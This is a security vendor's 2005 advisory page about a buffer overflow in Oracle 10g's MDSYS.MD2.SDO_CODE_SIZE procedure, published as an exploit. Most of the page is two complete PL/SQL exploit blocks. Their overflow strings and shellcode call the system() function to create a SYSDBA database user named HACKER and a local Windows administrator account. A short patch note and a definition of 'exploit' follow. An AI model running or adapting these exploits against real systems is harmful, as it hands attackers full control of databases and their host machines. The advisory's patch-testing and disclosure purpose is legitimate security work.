Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle Exploit Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE

Name Oracle Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Systems Affected Oracle 10g
Severity High Risk
Category Buffer Overflow
Vendor URL http://www.oracle.com/
Credit Esteban Martinez Fayo
Exploit http://www.argeniss.com/research/oraclesqlinj.zip
Date 05 May 2005 (V 1.00)


Details

It is possible to create a database user with DBA privileges or a local Windows administrator account by using
a buffer overflow in the procedure MDSYS.MD2.SDO_CODE_SIZE.


Example for Windows 2000 SP4 + Oracle 10.1.0.2
--Create a database user HACKER with SYSDBA privileges
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'echo CREATE USER HACKER IDENTIFIED BY HACKER; > c:\cu.sql'||chr(38)||'echo GRANT DBA TO HACKER; >> c:\cu.sql '||chr(38)||' echo ALTER USER HACKER DEFAULT ROLE DBA; >> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "HACKER" WITH ADMIN OPTION; >> c:\cu.sql'||chr(38)||'echo QUIT >> c:\cu.sql '||chr(38)||' c:\oracle\10.1.0\db_1\bin\sqlplus.exe "/ as sysdba" @c:\cu.sql 1> c:\stdout.log 2> c:\stderr.log';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
END;

--Create a windows OS user HACKER with administrator privileges
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
|| 'net user hacker /add '||chr(38)||' net localgroup Administradores hacker /add '||chr(38)||' net localgroup ORA_DBA hacker /add';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
end;

Patch Information
Apply the latest patchsets for Oracle alert 68 or later.




2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.